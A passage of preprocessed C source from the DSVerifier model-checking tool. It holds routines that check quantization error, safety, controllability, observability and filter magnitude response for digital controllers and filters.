double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller_fxp.C,_controller_fxp.states,result1);
if(flag == 1)
{
double_matrix_multiplication(nOutputs,nInputs,nInputs,1,_controller_fxp.D,_controller_fxp.inputs,result2);
}
double_add_matrix(nOutputs,1,result1,result2,_controller_fxp.outputs);
double_matrix_multiplication(nStates,nStates,nStates,1,_controller_fxp.A,_controller_fxp.states,result1);
double_matrix_multiplication(nStates,nInputs,nInputs,1,_controller_fxp.B,_controller_fxp.inputs,result2);
double_add_matrix(nStates,1,result1,result2,_controller_fxp.states);
return _controller_fxp.outputs[0][0];
}
double ss_closed_loop_quantization_error(double reference){
double reference_aux[4][4];
double result1[4][4];
double result2[4][4];
unsigned int i;
unsigned int j;
short unsigned int flag = 0;
for(i=0; i<nOutputs;i++){
for(j=0; j<nInputs;j++){
if(_controller_double.D[i][j] != 0){
flag = 1;
}
}
}
for(i=0; i<nInputs;i++){
for(j=0; j<1;j++){
reference_aux[i][j]= reference;
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
result1[i][j]=0;
result2[i][j]=0;
}
}
double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller_double.K,_controller_double.states,result1);
double_sub_matrix(nInputs,1,reference_aux,result1, _controller_double.inputs);
double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller_double.C,_controller_double.states,result1);
if(flag == 1)
double_matrix_multiplication(nOutputs,nInputs,nInputs,1,_controller_double.D,_controller_double.inputs,result2);
double_add_matrix(nOutputs,1,result1,result2,_controller_double.outputs);
double_matrix_multiplication(nStates,nStates,nStates,1,_controller_double.A,_controller_double.states,result1);
double_matrix_multiplication(nStates,nInputs,nInputs,1,_controller_double.B,_controller_double.inputs,result2);
double_add_matrix(nStates,1,result1,result2,_controller_double.states);
return _controller_double.outputs[0][0];
}
int verify_error_state_space(void){
int i,j;
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
new_state[i][j]= (_controller.states[i][j]);
}
}
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
new_stateFWL[i][j]= (_controller.states[i][j]);
}
}
_controller_fxp = _controller;
_controller_double = _controller;
overflow_mode = 0;
fxp_t x[0];
fxp_t min_fxp = fxp_double_to_fxp(impl.min);
fxp_t max_fxp = fxp_double_to_fxp(impl.max);
double nondet_constant_input = nondet_double();
__DSVERIFIER_assume(nondet_constant_input >= min_fxp && nondet_constant_input <= max_fxp);
for (i = 0; i < 0; ++i) {
x[i] = nondet_constant_input;
}
double __quant_error;
if(closed_loop){
for (i = 0; i < 0; ++i) {
__quant_error = ss_closed_loop_quantization_error(x[i]) - fxp_ss_closed_loop_quantization_error(x[i]);
# 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4
((void) sizeof ((
# 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
__quant_error < error_limit && __quant_error > ((-1)*error_limit)
# 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
__quant_error < error_limit && __quant_error > ((-1)*error_limit)
# 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4
) ; else __assert_fail (
# 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
"__quant_error < error_limit && __quant_error > ((-1)*error_limit)"
# 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h", 354, __extension__ __PRETTY_FUNCTION__); }))
# 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
;
}
}
else {
for (i=0; i < 0; i++)
{
__quant_error = ss_system_quantization_error(x[i]);
# 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4
((void) sizeof ((
# 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
__quant_error < error_limit && __quant_error > ((-1)*error_limit)
# 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
__quant_error < error_limit && __quant_error > ((-1)*error_limit)
# 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4
) ; else __assert_fail (
# 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
"__quant_error < error_limit && __quant_error > ((-1)*error_limit)"
# 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h", 361, __extension__ __PRETTY_FUNCTION__); }))
# 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
;
}
}
return 0;
}
# 44 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h" 1
# 17 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h"
extern digital_system_state_space _controller;
extern double error_limit;
extern int closed_loop;
double fxp_ss_closed_loop_safety(){
double reference[4][4];
double result1[4][4];
double result2[4][4];
fxp_t K_fpx[4][4];
fxp_t outputs_fpx[4][4];
fxp_t result_fxp[4][4];
unsigned int i;
unsigned int j;
unsigned int k;
short unsigned int flag = 0;
for(i=0; i<nOutputs;i++){
for(j=0; j<nInputs;j++){
if(_controller.D[i][j] != 0){
flag = 1;
}
}
}
for(i=0; i<nInputs;i++){
for(j=0; j<1;j++){
reference[i][j]= (_controller.inputs[i][j]);
}
}
for(i=0; i<nInputs;i++){
for(j=0; j<nOutputs;j++){
K_fpx[i][j]=0;
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<1;j++){
outputs_fpx[i][j]=0;
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
result_fxp[i][j]=0;
}
}
for(i=0; i<nInputs;i++){
for(j=0; j<nOutputs;j++){
K_fpx[i][j]= fxp_double_to_fxp(_controller.K[i][j]);
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
result1[i][j]=0;
result2[i][j]=0;
}
}
for (i = 1; i < 0; i++) {
double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller.C,_controller.states,result1);
if(flag == 1){
double_matrix_multiplication(nOutputs,nInputs,nInputs,1,_controller.D,_controller.inputs,result2);
}
double_add_matrix(nOutputs,
1,
result1,
result2,
_controller.outputs);
for(k=0; k<nOutputs;k++){
for(j=0; j<1;j++){
outputs_fpx[k][j]= fxp_double_to_fxp(_controller.outputs[k][j]);
}
}
fxp_matrix_multiplication(nInputs,nOutputs,nOutputs,1,K_fpx,outputs_fpx,result_fxp);
for(k=0; k<nInputs;k++){
for(j=0; j<1;j++){
result1[k][j]= fxp_to_double(result_fxp[k][j]);
}
}
printf("### fxp: U (before) = %.9f", _controller.inputs[0][0]);
printf("### fxp: reference = %.9f", reference[0][0]);
printf("### fxp: result1 = %.9f", result1[0][0]);
printf("### fxp: reference - result1 = %.9f", (reference[0][0] - result1[0][0]));
double_sub_matrix(nInputs,
1,
reference,
result1,
_controller.inputs);
printf("### fxp: Y = %.9f", _controller.outputs[0][0]);
printf("### fxp: U (after) = %.9f \n### \n### ", _controller.inputs[0][0]);
double_matrix_multiplication(nStates,nStates,nStates,1,_controller.A,_controller.states,result1);
double_matrix_multiplication(nStates,nInputs,nInputs,1,_controller.B,_controller.inputs,result2);
double_add_matrix(nStates,
1,
result1,
result2,
_controller.states);
}
return _controller.outputs[0][0];
}
int verify_safety_state_space(void){
fxp_t output_fxp = fxp_ss_closed_loop_safety();
double output_double = fxp_to_double(output_fxp);
# 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h" 3 4
((void) sizeof ((
# 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h"
output_double <= error_limit
# 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h"
output_double <= error_limit
# 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h" 3 4
) ; else __assert_fail (
# 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h"
"output_double <= error_limit"
# 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h", 140, __extension__ __PRETTY_FUNCTION__); }))
# 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h"
;
return 0;
}
# 45 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 1
# 14 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
extern digital_system_state_space _controller;
int verify_controllability(void){
int i;
int j;
fxp_t A_fpx[4][4];
fxp_t B_fpx[4][4];
fxp_t controllabilityMatrix[4][4];
fxp_t backup[4][4];
fxp_t backupSecond[4][4];
double controllabilityMatrix_double[4][4];
for(i=0; i<nStates;i++){
for(j=0; j<(nStates*nInputs);j++){
A_fpx[i][j] = 0.0;
B_fpx[i][j] = 0.0;
controllabilityMatrix[i][j] = 0.0;
backup[i][j] = 0.0;
backupSecond[i][j] = 0.0;
controllabilityMatrix_double[i][j] = 0.0;
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
A_fpx[i][j]= fxp_double_to_fxp(_controller.A[i][j]);
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nInputs;j++){
B_fpx[i][j]= fxp_double_to_fxp(_controller.B[i][j]);
}
}
if(nInputs > 1){
int l = 0;
for(j=0; j<(nStates*nInputs);){
fxp_exp_matrix(nStates,nStates,A_fpx,l,backup);
l++;
fxp_matrix_multiplication(nStates,nStates,nStates,nInputs,backup,B_fpx,backupSecond);
for(int k = 0; k < nInputs; k++){
for(i = 0; i<nStates;i++){
controllabilityMatrix[i][j]= backupSecond[i][k];
}
j++;
}
}
for(i=0; i<nStates;i++){
for(j=0; j<(nStates*nInputs);j++){
backup[i][j]= 0.0;
}
}
fxp_transpose(controllabilityMatrix,backup,nStates,(nStates*nInputs));
fxp_t mimo_controllabilityMatrix_fxp[4][4];
fxp_matrix_multiplication(nStates,(nStates*nInputs),(nStates*nInputs),nStates,controllabilityMatrix,backup,mimo_controllabilityMatrix_fxp);
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
controllabilityMatrix_double[i][j]= fxp_to_double(mimo_controllabilityMatrix_fxp[i][j]);
}
}
# 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
((void) sizeof ((
# 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
determinant(controllabilityMatrix_double,nStates) != 0
# 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
determinant(controllabilityMatrix_double,nStates) != 0
# 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
) ; else __assert_fail (
# 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
"determinant(controllabilityMatrix_double,nStates) != 0"
# 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h", 91, __extension__ __PRETTY_FUNCTION__); }))
# 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
;
} else {
for(j=0; j<nStates;j++){
fxp_exp_matrix(nStates,nStates,A_fpx,j,backup);
fxp_matrix_multiplication(nStates,nStates,nStates,nInputs,backup,B_fpx,backupSecond);
for(i = 0; i<nStates;i++){
controllabilityMatrix[i][j]= backupSecond[i][0];
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
controllabilityMatrix_double[i][j]= fxp_to_double(controllabilityMatrix[i][j]);
}
}
# 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
((void) sizeof ((
# 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
determinant(controllabilityMatrix_double,nStates) != 0
# 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
determinant(controllabilityMatrix_double,nStates) != 0
# 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
) ; else __assert_fail (
# 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
"determinant(controllabilityMatrix_double,nStates) != 0"
# 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h", 113, __extension__ __PRETTY_FUNCTION__); }))
# 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
;
}
return 0;
}
int verify_controllability_double(void){
int i;
int j;
double controllabilityMatrix[4][4];
double backup[4][4];
double backupSecond[4][4];
double controllabilityMatrix_double[4][4];
if(nInputs > 1){
int l = 0;
for(j=0; j<(nStates*nInputs);){
double_exp_matrix(nStates,nStates,_controller.A,l,backup);
l++;
double_matrix_multiplication(nStates,nStates,nStates,nInputs,backup,_controller.B,backupSecond);
for(int k = 0; k < nInputs; k++){
for(i = 0; i<nStates;i++){
controllabilityMatrix[i][j]= backupSecond[i][k];
}
j++;
}
}
for(i=0; i<nStates;i++){
for(j=0; j<(nStates*nInputs);j++){
backup[i][j]= 0.0;
}
}
transpose(controllabilityMatrix,backup,nStates,(nStates*nInputs));
double mimo_controllabilityMatrix_double[4][4];
double_matrix_multiplication(nStates,(nStates*nInputs),(nStates*nInputs),nStates,controllabilityMatrix,backup,mimo_controllabilityMatrix_double);
# 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
((void) sizeof ((
# 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
determinant(mimo_controllabilityMatrix_double,nStates) != 0
# 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
determinant(mimo_controllabilityMatrix_double,nStates) != 0
# 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
) ; else __assert_fail (
# 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
"determinant(mimo_controllabilityMatrix_double,nStates) != 0"
# 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h", 154, __extension__ __PRETTY_FUNCTION__); }))
# 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
;
} else {
for(j=0; j<nStates;j++){
double_exp_matrix(nStates,nStates,_controller.A,j,backup);
double_matrix_multiplication(nStates,nStates,nStates,nInputs,backup,_controller.B,backupSecond);
for(i = 0; i<nStates;i++){
controllabilityMatrix[i][j]= backupSecond[i][0];
}
}
# 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
((void) sizeof ((
# 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
determinant(controllabilityMatrix,nStates) != 0
# 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
determinant(controllabilityMatrix,nStates) != 0
# 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
) ; else __assert_fail (
# 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
"determinant(controllabilityMatrix,nStates) != 0"
# 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h", 163, __extension__ __PRETTY_FUNCTION__); }))
# 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
;
}
return 0;
}
# 46 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 1
# 17 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
extern digital_system_state_space _controller;
int verify_observability(void){
int i;
int j;
fxp_t A_fpx[4][4];
fxp_t C_fpx[4][4];
fxp_t observabilityMatrix[4][4];
fxp_t backup[4][4];
fxp_t backupSecond[4][4];
double observabilityMatrix_double[4][4];
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
observabilityMatrix[i][j]= 0;
A_fpx[i][j]=0;
C_fpx[i][j]= 0;
backup[i][j]= 0;
backupSecond[i][j]= 0;
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
A_fpx[i][j]= fxp_double_to_fxp(_controller.A[i][j]);
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<nStates;j++){
C_fpx[i][j]= fxp_double_to_fxp(_controller.C[i][j]);
}
}
if(nOutputs > 1){
int l;
j = 0;
for(l=0; l<nStates;){
fxp_exp_matrix(nStates,nStates,A_fpx,l,backup);
l++;
fxp_matrix_multiplication(nOutputs,nStates,nStates,nStates,C_fpx,backup,backupSecond);
for(int k = 0; k < nOutputs; k++){
for(i = 0; i<nStates;i++){
observabilityMatrix[j][i]= backupSecond[k][i];
}
j++;
}
}
# 80 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
for(i=0; i<nStates;i++){
for(j=0; j<(nStates*nOutputs);j++){
backup[i][j]= 0.0;
}
}
fxp_transpose(observabilityMatrix,backup,(nStates*nOutputs),nStates);
# 99 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
fxp_t mimo_observabilityMatrix_fxp[4][4];
fxp_matrix_multiplication(nStates,(nStates*nOutputs),(nStates*nOutputs),nStates,backup,observabilityMatrix,mimo_observabilityMatrix_fxp);
# 112 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
observabilityMatrix_double[i][j]= fxp_to_double(mimo_observabilityMatrix_fxp[i][j]);
}
}
# 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4
((void) sizeof ((
# 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
determinant(observabilityMatrix_double,nStates) != 0
# 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
determinant(observabilityMatrix_double,nStates) != 0
# 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4
) ; else __assert_fail (
# 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
"determinant(observabilityMatrix_double,nStates) != 0"
# 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h", 119, __extension__ __PRETTY_FUNCTION__); }))
# 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
;
}else{
for(i=0; i<nStates;i++){
fxp_exp_matrix(nStates,nStates,A_fpx,i,backup);
fxp_matrix_multiplication(nOutputs,nStates,nStates,nStates,C_fpx,backup,backupSecond);
for(j = 0; j<nStates;j++){
observabilityMatrix[i][j]= backupSecond[0][j];
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
observabilityMatrix_double[i][j]= fxp_to_double(observabilityMatrix[i][j]);
}
}
# 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4
((void) sizeof ((
# 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
determinant(observabilityMatrix_double,nStates) != 0
# 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
determinant(observabilityMatrix_double,nStates) != 0
# 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4
) ; else __assert_fail (
# 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
"determinant(observabilityMatrix_double,nStates) != 0"
# 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h", 134, __extension__ __PRETTY_FUNCTION__); }))
# 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
;
}
return 0;
}
# 47 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_magnitude.h" 1
# 16 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_magnitude.h"
extern filter_parameters filter;
extern implementation impl;
extern digital_system ds;
# 28 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_magnitude.h"
void resp_mag(double* num, int lnum, double* den, int lden, double* res, int N) {
double w;
int m, i;
double out_numRe[N + 1];
double out_numIm[N + 1];
double out_denRe[N + 1];
double out_denIm[N + 1];
double old_out_Re;
double zero_test;
for (w = 0, i = 0; w <= 3.14159265358979323846; w += 3.14159265358979323846 / N, ++i) {
out_numRe[i] = num[0];
out_numIm[i] = 0;
for (m = 1; m < lnum; ++m) {
old_out_Re = out_numRe[i];
out_numRe[i] = cosTyl(w, 6) * out_numRe[i] - sinTyl(w, 6) * out_numIm[i] + num[m];
out_numIm[i] = sinTyl(w, 6) * old_out_Re + cosTyl(w, 6) * out_numIm[i];
}
out_denRe[i] = den[0];
out_denIm[i] = 0;
for (m = 1; m < lden; ++m) {
old_out_Re = out_denRe[i];
out_denRe[i] = cosTyl(w, 6) * out_denRe[i] - sinTyl(w, 6) * out_denIm[i] + den[m];
out_denIm[i] = sinTyl(w, 6) * old_out_Re + cosTyl(w, 6) * out_denIm[i];
}
res[i] = sqrt3(out_numRe[i] * out_numRe[i] + out_numIm[i] * out_numIm[i]);
zero_test = sqrt3(out_denRe[i] * out_denRe[i] + out_denIm[i] * out_denIm[i]);
__DSVERIFIER_assume(zero_test != 0);
res[i] = res[i] / zero_test;
}
}
int verify_magnitude(void) {
int freq_response_samples = 100;
double w;
double w_incr = 1.0 / freq_response_samples;
double res[freq_response_samples+1];
int i,j;
fxp_t a_fxp[ds.a_size];
fxp_double_to_fxp_array(ds.a, a_fxp, ds.a_size);
double _a[ds.a_size];
fxp_to_double_array(_a, a_fxp, ds.a_size);
fxp_t b_fxp[ds.b_size];
fxp_double_to_fxp_array(ds.b, b_fxp, ds.b_size);
double _b[ds.b_size];
fxp_to_double_array(_b, b_fxp, ds.b_size);
resp_mag(ds.b, ds.b_size, ds.a, ds.a_size, res, freq_response_samples);
if (filter.type == 1) {
for (i = 0, w = 0; (w <= 1.0); ++i, w += w_incr) {
if (w <= filter.wp) {
__DSVERIFIER_assert_msg(res[i] >= filter.Ap, "|----------------Passband Failure-------------|");
} else if (w == filter.wc) {
__DSVERIFIER_assert_msg(res[i] <= filter.Ac, "|-------------Cutoff Frequency Failure--------|");
} else if ((w >= filter.wr) && (w <= 1)) {
__DSVERIFIER_assert_msg(res[i] <= filter.Ar, "|----------------Stopband Failure-------------|");
}
}
} else if (filter.type == 2) {
for (i = 0, w = 0; (w <= 1.0); ++i, w += w_incr) {
if (w <= filter.wr) {
__DSVERIFIER_assert_msg(res[i] <= filter.Ar, "|----------------Stopband Failure-------------|");
} else if (w == filter.wc) {
__DSVERIFIER_assert_msg(res[i] <= filter.Ac, "|-------------Cutoff Frequency Failure--------|");
} else if ((w > filter.wp) && (w <= 1)) {
